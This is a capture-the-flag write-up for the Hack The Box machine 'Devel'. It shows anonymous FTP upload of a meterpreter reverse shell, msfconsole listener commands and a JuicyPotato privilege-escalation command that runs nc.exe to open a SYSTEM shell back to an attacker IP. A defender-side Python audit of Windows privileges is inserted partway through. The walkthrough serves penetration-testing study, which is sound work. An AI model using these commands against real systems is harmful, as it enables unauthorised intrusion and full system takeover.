
Devel

image

Enumeration

First of all, let's start with a basic nmap scan:

image

As we can see, only ports 21 and 80 are open. We can also notice that port 21 (FTP) allows anonymous login. We can connect and list the files on the FTP server:

image

As we can see, this looks like the directory tree of the web server. When we browse to port 80, we see welcome.png in the center of the web page:

image

Initial Foothold

Since anonymous FTP lets us write into the web root, we can try to upload a web shell or a reverse shell with the put command. For that, I generated a meterpreter reverse shell using msfvenom:

image

I then uploaded it. Run the following commands in msfconsole to get a listener on port 443:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > run

In the commands above, type only what comes after the >; the msf5 ... prefix is the prompt printed by msfconsole when you launch it, so don't type it.

I then browse to http://10.10.10.5/config.aspx and get a meterpreter session:

image

Now that we have a meterpreter session, we can run a few basic commands to find out who we are and what rights we have:

image

Privilege Escalation

As we can see, we have a lot of rights. SeImpersonatePrivilege can be abused with JuicyPotato (which I explained here). I then uploaded nc.exe and JuicyPotato.exe:

image
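As an added defender-side example (not part of the original write-up), here is a small Python audit that parses the output of whoami /priv and flags privileges which let a compromised service account escalate, SeImpersonatePrivilege being the one abused above. The sample output is constructed for the example, modelled on what an IIS application pool identity typically holds.

```python
import re
from typing import Dict, Tuple

# Privileges that are well known to let a process escalate to SYSTEM or bypass
# ACLs when they are present in its token. SeImpersonatePrivilege and
# SeAssignPrimaryTokenPrivilege are the ones the Potato family relies on.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate a client token (JuicyPotato-style abuse)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token (JuicyPotato-style abuse)",
    "SeDebugPrivilege": "read/write the memory of any process",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# One table row of `whoami /priv`: name, free-text description, state.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")

# Constructed sample, not captured from the machine in the write-up.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Return {privilege name: 'Enabled'|'Disabled'} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs

def audit(privs: Dict[str, str]) -> Dict[str, Tuple[str, str]]:
    """Report high-risk privileges held, whatever their state: a process can
    re-enable a Disabled privilege it holds, so 'Disabled' does not reduce risk."""
    return {n: (privs[n], HIGH_RISK[n]) for n in privs if n in HIGH_RISK}

if __name__ == "__main__":
    for name, (state, why) in audit(parse_whoami_priv(SAMPLE)).items():
        print(f"{name:32} {state:9} {why}")
```

On a real host, feed it the output of whoami /priv run as the web application's identity; any hit means that identity should be stripped of the privilege or the service moved to a less privileged account.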

But when I tried to run the JuicyPotato command, I got an error saying that the binary was not in the correct format:

image

So I used this version of JuicyPotato that I called JP.exe:

image

Now this should work, so I start a basic nc listener on port 445 and run the following command:

c:\Users\Public\Downloads\JP.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\Users\Public\Downloads\nc.exe 10.10.14.56 445 -e cmd" -t *

This default command didn't work, so I ran the same command with the -c option to specify the CLSID. A CLSID ("Class Identifier") is the unique identifier Windows uses to identify COM (Component Object Model) objects and their associated components. I then referred to this page and tried every CLSID until I got an NT AUTHORITY\SYSTEM command prompt (the correct one is the second one, {03ca98d6-ff5d-49b8-abc6-03dd84127020}):

image

Note that we first selected Windows 7 Enterprise on that page to get the correct list of CLSIDs. If the target weren't a Windows 7 Enterprise machine, we would have had to pick another list of CLSIDs.

The command worked, and as we can see, we have a cmd as NT AUTHORITY\SYSTEM:

image

We can now get both flags, and voilà…

image

This post is licensed under CC BY 4.0 by the author.